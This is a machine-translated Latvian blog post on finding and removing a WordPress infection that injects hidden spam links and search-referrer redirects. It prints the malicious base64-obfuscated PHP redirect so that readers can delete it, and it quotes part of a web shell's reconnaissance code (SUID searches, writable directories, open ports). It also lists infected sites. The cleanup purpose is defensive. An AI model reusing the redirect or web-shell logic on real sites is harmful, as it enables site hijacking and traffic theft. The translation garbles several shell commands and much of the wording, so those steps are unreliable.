Pēdējā mēneša laikā es nepārtraukti saņēmu brīdinājumus no vīruss emuārā no dažiem apmeklētājiem. Sākotnēji es ignorēju brīdinājumus, jo man bija instalēts diezgan labs antivīruss (Kaspersky AV 2009) un, lai gan blogā pavadīju ilgu laiku, vīrusa brīdinājumu nesaņēmu (.. pirms kāda laika redzēju kaut ko aizdomīgu, kas pazuda pirmajā atsvaidzināšanas reizē. beidzot...).
Lēnām, lēnām sāka parādīties lielas variācijas apmeklētāju plūsma, pēc kā pēdējā laikā satiksme ir nepārtraukti samazinājusies un arvien vairāk sāk man to teikt Stealthsettings.com tas ir virusat. Vakar es no kāda saņēmu ekrānuzņēmumu, kas tika uzņemts, kad antivīruss to bloķēja skripts no stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Man tas bija pietiekami pārliecinoši, ka sāku to meklēt visos avotos. Pirmā doma, kas man ienāca prātā, bija to izdarīt jauninājums uz jaunāko versiju WordPress (2.5.1), bet ne pirms visu veco WordPress skriptu failu dzēšanas un veikšanas datu bāzes dublējums. Šī procedūra nedeva nekādus rezultātus, un, iespējams, man būtu vajadzīgs ilgs laiks, lai saprastu, kur ir kļūda, ja viņš man to nebūtu teicis Eugens diskusijā pie kafijas, ko viņš atrada saite Google, un būtu labi to redzēt.
MyDigitalLife.info publicēja rakstu ar nosaukumu: "WordPress uzlaušana: Google un meklētājprogrammas atkopšana un labošana vai sīkfailu trafika, kas nav novirzīta uz Your-Needs.info, AnyResults.Net, Golden-Info.net un citām nelegālām vietnēm”, kas ir man vajadzīgā pavediena beigas.
Runa ir par a izmantot WordPress, pamatojoties uz sīkfailiem, kas, manuprāt, ir ļoti sarežģīts un izgatavots saskaņā ar grāmatu. Pietiekami gudrs, lai tādu izveidotu SQL injekcija emuāru datubāzē, lai izveidotu neredzamu lietotāju uz vienkāršu ikdienas pārbaudi no Paneļa->Lietotāji, lai pārbaudītu "rakstāmos" direktorijus un failus serverī (kuriem ir chmod 777), lai meklētu un uz izpildīt failus ar grupas vai pat root tiesībām. Nezinu eksploīta nosaukumu un redzu, ka par to ir rakstīts maz rakstu, neskatoties uz to, ka ir daudz inficētu emuāru, tostarp no Rumānijas. Ok... mēģināšu vispārīgi paskaidrot par šo vīrusu.

Ko vīruss dara?

Pirmkārt, tas ievieto emuāru lapu avotos neredzamas saites apmeklētājiem, bet redzamas un indeksējamas meklētājprogrammām, īpaši Google. Tādā veidā pārsūtīt Page Rank uz uzbrucēja norādītajām vietnēm. Otrkārt, tiek ievietots vēl viens novirzīšanas kods URL apmeklētājiem, kas nāk no Google, Live, Yahoo, ... vai no RSS lasītāja un kuriem nav vietnes cepums. Un pretvīruss nosaka šo novirzīšanu kā Trojan-Clicker.HTMLApvidū

Simptomi:

Milzīgs apmeklētāju plūsmas kritums, jo īpaši emuāros, kur lielākā daļa apmeklētāju nāk no Google.

Identificēt: (šeit problēma kļūst sarežģīta tiem, kas neko daudz nezina par phpmyadmin, php un linux)

THE. UZMANĪGI!!! PIRMS VEIC DATU BĀZES DUBLĒJUMU!!!

1. Pārbaudiet failu avotus indekss.php, header.php, kājene.php, no emuāra tēmas un pārbaudiet, vai ir kods, kas izmanto šifrēšanu bāze64 vai satur "if($ser=="1? && sizeof($_COOKIE)==0)” formā:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

...vai kaut kas līdzīgs. Izdzēsiet šo kodu!

Noklikšķiniet uz iedomāties…

Iepriekš esošajā ekrānuzņēmumā es kļūdaini izvēlējos "<?php get_header(); ?>Tam kodam ir jāpaliek.

2. Izmantošana phpmyadmin un dodieties uz tabulu datu bāzē wp_users, kur pārbauda, ​​vai ir kāds lietotājs bez vārda, izveidots 00:00:00 0000-00-00 (tas ir iespējams uz lauka user_login uzrakstiet "WordPress". Pierakstiet šī lietotāja ID (ID lauks) un pēc tam izdzēsiet to.

Noklikšķiniet uz iedomāties…

*tas, kas atrodas uz zaļās līnijas, tā ID ir jāizdzēš un jāsaglabā. Viņa gadījumā miegains, bija ID=8 Apvidū

3. Iet uz galdu wp_usermeta, kur vajag atrodas tu esi DZĒST rindas, kas saistītas ar ID (kur laukā lietotāja_id parādās dzēstā ID vērtība).

4. Tabulā wp_option, ej iekšā Active_plugins un redzēt, kurš spraudnis ir aizdomīgi aktivizēts. Tas var izmantot galotnes, piemēram, _old.giff, _old.pngg, _old.jpeg, _new.php.giffuc viltus attēlu paplašinājumu kombinācijas ar _old un _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Izdzēsiet šo spraudni, pēc tam dodieties uz emuāru -> Informācijas panelis —> Spraudņi, kur jūs deaktivizējat un aktivizējat noteiktu spraudni.

Noklikšķiniet uz attēla, lai redzētu, kā inficētais fails parādās Active_plugins.

Izpildiet FTP vai SSH ceļu, kas norādīts Active_plugins, un izdzēsiet failu no servera.

5. Arī phpMyAdmin, tabulā wp_option, atrodiet un izdzēsiet rindu, kurā ir "rss_f541b3abd05e7962fcab37737f40fad8"un pagriezties"internal_links_cache”Apvidū
Sadaļā internal_links_cache surogātpasta saites, kas tiek rādītas emuārā, un a Google Adsense kods, no hakera.

6. Ieteicams, lai jūs mainīt paroli par pieteikšanos emuārā un tā tālāk noņemt visus aizdomīgos lietotājus. Jauniniet uz jaunāko WordPress versiju un iestatiet emuāru tā, lai tas vairs neļautu reģistrēt jaunus lietotājus. Zaudējumu nav... komentēt var pat nepieteicies.

Mēģināju augstāk paskaidrot, cik daudz, ko darīt šādā situācijā, lai attīrītu blogu no šī vīrusa. Problēma ir daudz nopietnāka nekā šķiet un nav tālu no risināšanas, jo tās tiek izmantotas Drošības ievainojamības mitināšanas tīmekļa servera, kurā atrodas emuārs.

Kā pirmais drošības līdzeklis, kam ir pieeja Ssh, lai pārbaudītu, vai joprojām ir tādi faili kā *_old* un *_new.* ar galotnēm .gif, .jpeg, .pngg, .jpgg. Šie faili ir jāizdzēš. Ja mēs pārdēvējam failu, piem. top_right_old.giff iekšā top_right_old.php, mēs redzam, ka failā ir tieši servera izmantošanas kods.

Daži noderīgi padomi servera pārbaudei, tīrīšanai un drošībai. (izmantojot SSH)

1. cd /tmp un pārbaudiet, vai ir šādas mapes tmpVFlma vai citas līdzīgas nosaukumu kombinācijas un izdzēsiet to. Tālāk esošajā ekrānuzņēmumā varat redzēt divas šādas mapes:

rm – rf numuru mape

2. Pārbaudīt un likvidēt (mainīt chmod) pēc iespējas vairāk mapes ar atribūtiem chmod 777

atrast visus ierakstāmos failus pašreizējā direktorijā: atrast. -tipa f -perm -2 -ls
atrast visus ierakstāmos direktorijus pašreizējā direktorijā: atrast. -tipa d -perm -2 -ls
atrodiet visus ierakstāmos direktorijus un failus pašreizējā direktorijā: atrast. -ilgviļņi -2 –ls

3. Meklējiet serverī aizdomīgus failus.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, UZMANĪGI!!! failiem, kas iestatīja bitu DIENVIDI un APAVIApvidū Šie faili tiek izpildīti ar lietotāja (grupas) vai saknes privilēģijām, nevis ar lietotāja, kurš izpilda failu, privilēģijām. Šie faili var izraisīt saknes kompromisu, ja ir drošības problēmas. Ja neizmantojat failus ar SUID un SGID bitiem, palaidiet "chmod 0” vai atinstalējiet tos saturošo pakotni.

Ekspluatācija satur kaut kur avotā...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

...praktiski šādā veidā viņš atrod drošības pārkāpumus. Atveriet portus, "rakstāmus" direktorijus un failu izpildi ar grupas / saknes privilēģijām.

Es atgriezīšos ar detaļām...

Daži inficēti emuāri: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... un sarakstu var turpināt ... daudz.

Varat pārbaudīt, vai emuārs ir inficēts, izmantojot Google meklētājprogrammu. kopiju & ielīmēt:

vietne: www.blegoo.com pirkt

Ar labu nakti un labu darbu ;) Drīzumā es domāju, ka Eugen nāks ar jaunumiem, vietnē prevezibil.imprevizibil.com.

brb :)

AT: UZMANĪBU! WordPress motīva maiņa vai jaunināšana uz WordPress 2.5.1 NAV risinājums, lai atbrīvotos no šī vīrusa.